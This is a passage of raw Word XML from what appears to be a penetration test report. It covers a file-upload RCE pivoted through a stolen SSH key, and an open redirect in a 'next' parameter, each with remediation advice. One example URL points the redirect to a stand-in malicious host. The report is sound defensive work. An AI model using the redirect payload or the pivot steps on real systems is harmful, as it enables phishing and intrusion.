      <w:tr w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w14:paraId="1F2D2A7F"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69076DE" w14:textId="2434A14F" w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00BB46B0" w:rsidP="00AF346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BB46B0" w:rsidRPr="00D77DFE" w14:paraId="14D199E2"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C37D41F" w14:textId="0C1DB357" w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00BB46B0" w:rsidP="00BB46B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0.3.190, 10.0.4.141</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w14:paraId="1CD59884"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5A5986E" w14:textId="1EB2DE81" w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00BB46B0" w:rsidP="00BB46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BB46B0" w:rsidRPr="00D77DFE" w14:paraId="58D3E7BF"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63C77FD" w14:textId="546E6520" w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00BB46B0" w:rsidP="00BB46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This vulnerability enables full server compromise, internal lateral movement, and exposure of sensitive data such as SSH keys, highlighting the need to fix the upload flaw, secure credentials, and restrict SSH access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w14:paraId="4778AA3A"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7FCC75A" w14:textId="21817DEA" w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00BB46B0" w:rsidP="00BB46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BB46B0" w:rsidRPr="00D77DFE" w14:paraId="4906CBCC"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E7FD478" w14:textId="24C52089" w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00BB46B0" w:rsidP="00BB46B0">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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Fix the initial file upload vulnerability, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Protect</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> sensitive keys and credentials, Restrict SSH access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="3B5916C8"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FE9E73F" w14:textId="455318DD" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="69FE1EAD"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EBB1413" w14:textId="54EBC3C3" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploit the file-upload RCE to gain a shell on 10.0.3.190, extract private SSH keys, configure one for authentication, and use it to access 10.0.4.141 as ubuntu, achieving internal access despite direct network restrictions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w14:paraId="6C45C3E5"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E8C026C" w14:textId="77777777" w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00BB46B0" w:rsidP="00BB46B0">
            <w:pPr>
              <w:spacing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BB46B0" w:rsidRPr="00D77DFE" w14:paraId="01D4E12A"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4E43513" w14:textId="320316CA" w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00BB46B0" w:rsidP="00BB46B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing/>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Proof of Concept evidence is provided in Appendix A, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureAI11" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Figure A.11 Pivoting via Exposed SSH Private Key</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00431D09" w:rsidRPr="00D77DFE" w14:paraId="3C3E6A63" w14:textId="77777777" w:rsidTr="007B6EB7">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ECEBD3B" w14:textId="588CA8B3" w:rsidR="00431D09" w:rsidRPr="00D77DFE" w:rsidRDefault="00431D09"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431D09" w:rsidRPr="00D77DFE" w14:paraId="6FF3C481" w14:textId="77777777" w:rsidTr="00431D09">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18FAD2F" w14:textId="23415EF3" w:rsidR="00431D09" w:rsidRPr="00D77DFE" w:rsidRDefault="00431D09" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId45" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/522.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink r:id="rId46" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/255.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3215D79C" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00815CEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="319B8D39" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00815CEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A5EC807" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00815CEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9439" w:type="dxa"/>
        <w:tblInd w:w="-48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C02F3D" w:rsidRPr="00D77DFE" w14:paraId="5A4E235A" w14:textId="77777777" w:rsidTr="00CD5DDB">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8D12391" w14:textId="5BDDA27E" w:rsidR="00C02F3D" w:rsidRPr="00D77DFE" w:rsidRDefault="00C02F3D" w:rsidP="00CD5DDB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Open redirect </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>in ,,next</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>” parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C02F3D" w:rsidRPr="00D77DFE" w14:paraId="27B5AF02" w14:textId="77777777" w:rsidTr="00CD5DDB">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5F09A7D" w14:textId="30353BA0" w:rsidR="00C02F3D" w:rsidRPr="00D77DFE" w:rsidRDefault="00C02F3D"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A638A1A" w14:textId="75BAB948" w:rsidR="00C02F3D" w:rsidRPr="00D77DFE" w:rsidRDefault="00C02F3D"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C02F3D" w:rsidRPr="00D77DFE" w14:paraId="4AB7E87F"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2AF1DF3" w14:textId="7527C42A" w:rsidR="00C02F3D" w:rsidRPr="00D77DFE" w:rsidRDefault="00C02F3D"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w:t>
            </w:r>
            <w:r w:rsidR="001E4866" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12</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31C961F" w14:textId="08A93250" w:rsidR="00C02F3D" w:rsidRPr="00D77DFE" w:rsidRDefault="00C02F3D"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40160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7118716A" wp14:editId="63AC8CEA">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>1025525</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>34925</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="407747978" name="Rectangle: Rounded Corners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C3661B" id="Rectangle: Rounded Corners 4" o:spid="_x0000_s1026" style="position:absolute;margin-left:80.75pt;margin-top:2.75pt;width:125.8pt;height:10.0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" fillcolor="yellow" strokecolor="yellow">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C02F3D" w:rsidRPr="00D77DFE" w14:paraId="116651C9"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C5F3AB0" w14:textId="4B57DF94" w:rsidR="00C02F3D" w:rsidRPr="00D77DFE" w:rsidRDefault="00C02F3D"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CVSS: </w:t>
            </w:r>
            <w:r w:rsidR="00646D0D" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.4</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C5B30A7" w14:textId="77777777" w:rsidR="00C02F3D" w:rsidRPr="00D77DFE" w:rsidRDefault="00C02F3D"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C02F3D" w:rsidRPr="00D77DFE" w14:paraId="4749B196"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D5C3AB4" w14:textId="73D45A0B" w:rsidR="00C02F3D" w:rsidRPr="00D77DFE" w:rsidRDefault="00646D0D"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UI:R</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S:U</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C:N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644C515" w14:textId="3C1A1501" w:rsidR="00C02F3D" w:rsidRPr="00D77DFE" w:rsidRDefault="00C02F3D" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-601: URL Redirection to Untrusted Site ('Open Redirect')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="255D46A3"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12EA42D" w14:textId="5752E155" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="274DDCE4"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EBD17FC" w14:textId="630BD0B7" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00AF346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Browser, Burp Suite, ZAP Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="5FF5AB37" w14:textId="77777777" w:rsidTr="00CD5DDB">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34F301E" w14:textId="68A896F9" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="69E63312" w14:textId="77777777" w:rsidTr="00CD5DDB">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9256025" w14:textId="3F422C41" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00AF346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Open redirection occurs when user-controlled input is used in redirects, allowing attackers to craft links that send users to malicious external sites, enabling phishing attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="25B7B242"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2997F5C" w14:textId="2BB2215C" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="5DD287B2"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E03409B" w14:textId="70ACAE93" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00AF3469">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http://10.0.3.190/main.php?next=http://malicious_page.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="244180E1"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249CCC5" w14:textId="2E14BE39" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00AF3469">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Implications / Consequences of not Fixing the Issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="3C2CCC71"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0432D47" w14:textId="4F38E21E" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00AF3469">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open redirects enable phishing by disguising malicious links as trusted URLs, support social‑engineering attacks, and allow abuse of legitimate redirect behavior to bypass security controls.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="591E630F"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7080116" w14:textId="75A3F0DE" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="05C2FA9D"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F0D8C0F" w14:textId="5A0B114F" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00AF346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lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Implement a strict allowlist for redirect targets, validate and normalize the next parameter to permit only safe internal paths, and block or require confirmation for any external redirects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="220B500E"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76252B2" w14:textId="50FF52D0" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="39AC815D"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4E46968" w14:textId="29EBAAAC" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00AF3469">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Cs/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Provide an external URL in the next parameter of the redirect endpoint and observe that, instead of validating or restricting the value, the application redirects the browser to the supplied external destination.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF3469" w:rsidRPr="00D77DFE" w14:paraId="18F40AA8"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48261F1" w14:textId="20BBA87D" w:rsidR="00AF3469" w:rsidRPr="00D77DFE" w:rsidRDefault="00AF3469" w:rsidP="00AF3469">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AF3469" w:rsidRPr="00D77DFE" w14:paraId="5EFB3D5D"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466954E" w14:textId="4B344466" w:rsidR="009912C3" w:rsidRPr="00D77DFE" w:rsidRDefault="009E4D57" w:rsidP="00A35E3D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Proof of Concept evidence is provided in Appendix A, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureAI121" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Figure A.</w:t>
              </w:r>
              <w:r w:rsidR="009912C3" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>12.1 Open redirect in ,,next” parameter</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00A35E3D" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureAI122" w:history="1">
              <w:r w:rsidR="009912C3" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve">Figure </w:t>
              </w:r>
              <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>A.</w:t>
              </w:r>
              <w:r w:rsidR="009912C3" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>12.2 Open redirect in ,,next” parameter</w:t>
              </w:r>
              <w:r w:rsidR="00815CEC" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve"> -</w:t>
              </w:r>
              <w:r w:rsidR="009912C3" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve"> Manipulating the parameter</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4763E955" w14:textId="2970A956" w:rsidR="009912C3" w:rsidRPr="00D77DFE" w:rsidRDefault="009912C3" w:rsidP="009912C3">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="FigureAI123" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve">Figure </w:t>
              </w:r>
              <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>A.</w:t>
              </w:r>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve">12.3 Open redirect </w:t>
              </w:r>
              <w:proofErr w:type="gramStart"/>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>in ,,next</w:t>
              </w:r>
              <w:proofErr w:type="gramEnd"/>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve">” parameter </w:t>
              </w:r>
              <w:r w:rsidR="00A17D03" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
